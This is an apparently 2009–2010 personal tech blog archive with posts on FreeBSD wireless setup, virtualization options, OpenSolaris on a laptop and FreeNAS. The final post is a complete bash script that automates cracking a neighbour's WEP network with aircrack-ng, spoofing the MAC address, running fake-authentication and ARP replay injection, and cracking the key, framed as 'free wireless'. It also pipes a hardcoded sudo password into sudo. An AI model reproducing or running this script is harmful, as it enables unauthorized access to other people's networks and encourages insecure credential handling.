Archivo

Archivo para la categoría ‘network’

FreeBSD Wireless WEP/WAP

domingo, 28 de febrero de 2010 Sin comentarios

FreeBSD Wireless WEP/WAP

/etc/wpa_supplicant.conf

# WEP
network={
	ssid="YOUR_NETWORK"
	key_mgmt=NONE
	wep_key0=6666666666
	wep_tx_keyidx=0
	priority=5
}
# WAP
network={
	ssid="YOUR_NETWORK"
	psk="Password"
	priority=5
}
wpa_supplicant -Bi wlan0 -c /etc/wpa_supplicant.conf

/etc/rc.conf

ifconfig_wlan0="WPA DHCP"

In my case wlan0 is rum0

Categories: network, unix/linux Tags:

Virtualization options

domingo, 28 de febrero de 2010 Sin comentarios

Virtualization Options

For personal or business infrastructure:

- VMware vSphere, VMware Server, VMware Player , VMware ESXi
- VirtualBox, VirtualBox Web Console
- Xen , Xen Live CD
- Qemu
- KVM
- Virtual PC
- Hyper-V
- Citrix
- Oracle VM
- Parallels

Others:
- Bochs
- Dosbox Run old DOS App or Games

Cloud computing Virtualization:

- Amazon Elastic Compute Cloud, Amazon Virtual Private Cloud
- ElasticHosts

useful options to separate processes and information:

Linux use Chroot
OpenSolaris use Zones
FreeBSD use Jails
NetBSD and OpenBSD use Sysjails

Maybe there are many other options to virtualization.

OpenSolaris 2009.06 on Toshiba Satellite u205

sábado, 31 de octubre de 2009 Sin comentarios

OpenSolaris 2009.06 on Toshiba Satellite u205

I have a little time using Debian Squeeze on my Notebook today i decide to test OpenSolaris 2009.06

- Wireless Works Fine :D
- Some buttons no work (browser/music/play/stop/prev/next) :(
- To lisen mp3 files, I need to register on fluendo. :|
- To enable Flash on Firefox only download from adobe and move libflashplayer.so to /usr/lib/firefox/plugins :D

Screens:

Now I need to read [ http://dlc.sun.com/osol/docs/content/2009.06/getstart/ ]

FreeNAS

domingo, 4 de octubre de 2009 3 comentarios

FreeNAS

FreeNAS is a free NAS (Network-Attached Storage) Server.

www.freenas.org

There are many services some are: FTP, TFTP, SSH, HTTP, SAMBA, RSYNC and more.

Easy to install only need one floppy disk or cardflash memory (to save config) or small hard disk to install the system of the CD.

Some services needs you have static IP (not DHCP like FTP Service)

FreeNAS it’s a great option if you want to storage a lot of information and share that information using service (http/ftp/samba/etc.)

Very small and very powerfull.

Categories: network, unix/linux, web Tags: ,

Wireless Hack Bash Script

domingo, 23 de agosto de 2009 2 comentarios

Wireless Hack Bash Script

#!/bin/bash
#
# WARNING: USE AT YOUR OWN RISK!
#
# SIDE EFFECTS: UNHAPPY NEIGHTBORS
# 
# Author: ALbertux (Alberto Isaac Ayala Esquivias)
# Mail: <Albertux@AyalaSoft.com>
# Web: http://Albertux.AyalaSoft.com
# Script: Wireless Hack
# Tested on: Ubuntu 9.04
 
# A little trouble using gksudo gnome-terminal
# https://bugs.launchpad.net/ubuntu/+source/gconf2/+bug/328575
# gnome-terminal -e "sudo ...." # could be ...
# TERM=gnome-terminal
TERM=xterm
 
# A nasty function to run_like_a_root user sending the passwd
function run_like_a_root() {
sudo -S $@ << EOF
your_password
EOF
}
 
# Restore to normal: ./this_script.sh restore
if [ "$1" == "restore" ]; then
	run_like_a_root "airmon-ng stop mon0"
	run_like_a_root "/etc/init.d/networking restart"
	run_like_a_root "NetworkManager"
	exit 1
fi
 
# Set Wireless Device: ./this_script.sh wlan1
if [ -z $1 ]; then
	WDEVICE=wlan0 # Could be diferrent on your notebook
else
	WDEVICE=$1 # Set Wireless Device
fi
 
# Stop Wireless
run_like_a_root airmon-ng stop $WDEVICE
 
# Kill all fu**ing process using the Wireless Device:
run_like_a_root kill -9 `run_like_a_root airmon-ng start $WDEVICE | grep ^[1-9] | awk ' { print $1 } '`
 
# Wireless Devices Down (we need to change the Mac)
run_like_a_root ifconfig $WDEVICE down
run_like_a_root ifconfig mon0 down
 
# Fake Mac, Example:
FAKEMAC=00:66:00:66:00:66
 
# Set Fake Mac
run_like_a_root macchanger -m $FAKEMAC $WDEVICE
run_like_a_root macchanger -m $FAKEMAC mon0
 
# Up the Wireless Interface
run_like_a_root ifconfig mon0 up
 
# See all available networks
run_like_a_root $TERM -e "airodump-ng mon0" &
 
# Watch the xterm loaded and write the values (maybe you need resize xterm window)
clear
echo "Network Name: "
read ESSID
echo "Network Mac: "
read BSSID
echo "Network Channel: "
read CHANNEL
echo "Close the airodump-ng xterm and press [enter]"
read
 
# Get Data (IVs)
run_like_a_root $TERM -e "airodump-ng mon0 -w data -c $CHANNEL --bssid $BSSID" &
 
# Fake Authentication Attack
run_like_a_root $TERM -e "watch aireplay-ng -1 0 -e $ESSID -a $BSSID -h $FAKEMAC mon0" &
 
# ARP Request
run_like_a_root $TERM -e "aireplay-ng -3 -b $BSSID -h $FAKEMAC mon0" &
 
# Wait some time ...
echo "Press any kay to launch aircrack-ng (30,000+ on data recommended)"
read
 
# Crack the Passwd
run_like_a_root $TERM -e "aircrack-ng data-*.cap" &
 
exit 0

Free Wireless on Ubuntu 9.04

Switch to our mobile site